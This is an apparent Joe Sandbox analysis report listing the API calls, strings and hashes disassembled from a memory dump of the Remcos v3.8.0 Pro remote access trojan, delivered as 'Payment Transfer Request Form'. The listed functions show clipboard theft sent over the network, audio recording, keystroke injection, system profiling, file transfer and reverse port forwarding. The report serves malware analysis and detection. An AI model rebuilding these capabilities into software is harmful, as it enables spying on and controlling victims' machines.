                                                • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                              • String ID: H"G$H"G
                                              • API String ID: 3795512280-1424798214
                                              • Opcode ID: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                              • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                              • Opcode Fuzzy Hash: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
                                              • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                              APIs
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DecodePointer
                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                              • API String ID: 3527080286-3064271455
                                              • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                              • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                              • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                              • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • Sleep.KERNEL32(00000064), ref: 00415A46
                                              • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreateDeleteExecuteShellSleep
                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                              • API String ID: 1462127192-2001430897
                                              • Opcode ID: 87204c94d8b5b584fbbb093271ea72491aa65725750486abe71317da31de1f17
                                              • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                              • Opcode Fuzzy Hash: 87204c94d8b5b584fbbb093271ea72491aa65725750486abe71317da31de1f17
                                              • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                              APIs
                                              • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                              • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocConsoleShowWindow
                                              • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                              • API String ID: 4118500197-4025029772
                                              • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                              • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                              • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                              • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                              • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                              • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                              • TranslateMessage.USER32(?), ref: 0041B29E
                                              • DispatchMessageA.USER32(?), ref: 0041B2A8
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                              • String ID: Remcos
                                              • API String ID: 1970332568-165870891
                                              • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                              • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                              • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                              • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                              • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                              • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                              • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                              APIs
                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                              • __alloca_probe_16.LIBCMT ref: 004510CA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                              • __alloca_probe_16.LIBCMT ref: 00451174
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                              • __freea.LIBCMT ref: 004511E3
                                              • __freea.LIBCMT ref: 004511EF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                              • String ID:
                                              • API String ID: 201697637-0
                                              • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                              • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                              • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                                              • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • _memcmp.LIBVCRUNTIME ref: 00442935
                                              • _free.LIBCMT ref: 004429A6
                                              • _free.LIBCMT ref: 004429BF
                                              • _free.LIBCMT ref: 004429F1
                                              • _free.LIBCMT ref: 004429FA
                                              • _free.LIBCMT ref: 00442A06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorLast$_abort_memcmp
                                              • String ID: C
                                              • API String ID: 1679612858-1037565863
                                              • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                              • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                              • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                              • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tcp$udp
                                              • API String ID: 0-3725065008
                                              • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                              • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                              • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                              • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Eventinet_ntoa
                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                              • API String ID: 3578746661-168337528
                                              • Opcode ID: 035bfc4778cbd1147fb7c7760a67f5a58305d03ef9b3c3f33c5966ee6578fdb6
                                              • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                              • Opcode Fuzzy Hash: 035bfc4778cbd1147fb7c7760a67f5a58305d03ef9b3c3f33c5966ee6578fdb6
                                              • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                                                • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                              • String ID: .part
                                              • API String ID: 1303771098-3499674018
                                              • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                              • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                              • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                              • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                                              • __alloca_probe_16.LIBCMT ref: 00447056
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                                              • __alloca_probe_16.LIBCMT ref: 0044713B
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                              • __freea.LIBCMT ref: 004471AB
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • __freea.LIBCMT ref: 004471B4
                                              • __freea.LIBCMT ref: 004471D9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID:
                                              • API String ID: 3864826663-0
                                              • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                              • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                              • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                              • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InputSend
                                              • String ID:
                                              • API String ID: 3431551938-0
                                              • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                              • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                              • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                              • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                              APIs
                                              • OpenClipboard.USER32 ref: 00414F41
                                              • EmptyClipboard.USER32 ref: 00414F4F
                                              • CloseClipboard.USER32 ref: 00414F55
                                              • OpenClipboard.USER32 ref: 00414F5C
                                              • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                              • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                              • CloseClipboard.USER32 ref: 00414F84
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                              • String ID:
                                              • API String ID: 2172192267-0
                                              • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                              • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                              • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                              • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                              APIs
                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                              • __fassign.LIBCMT ref: 00447814
                                              • __fassign.LIBCMT ref: 0044782F
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                              • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                              • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                              • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                              • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                              • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: $-E$$-E
                                              • API String ID: 269201875-3140958853
                                              • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                              • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                              • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                              • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                              APIs
                                              • _strftime.LIBCMT ref: 00401D30
                                                • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                              • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                              • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                              • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                              • String ID: %Y-%m-%d %H.%M$.wav
                                              • API String ID: 3809562944-3597965672
                                              • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                              • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                              • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                              • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                              APIs
                                                • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                              • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                              • API String ID: 1133728706-4073444585
                                              • Opcode ID: 370a5f736c1175a4c73cc9f78fb379498555740690ae6c69fa9422c82b9c0863
                                              • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                              • Opcode Fuzzy Hash: 370a5f736c1175a4c73cc9f78fb379498555740690ae6c69fa9422c82b9c0863
                                              • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                              • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                              • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                                              • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                              APIs
                                                • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                              • _free.LIBCMT ref: 0044E128
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 0044E133
                                              • _free.LIBCMT ref: 0044E13E
                                              • _free.LIBCMT ref: 0044E192
                                              • _free.LIBCMT ref: 0044E19D
                                              • _free.LIBCMT ref: 0044E1A8
                                              • _free.LIBCMT ref: 0044E1B3
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                              • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                              • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                              • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                              APIs
                                              • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                              • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                              • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                              • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
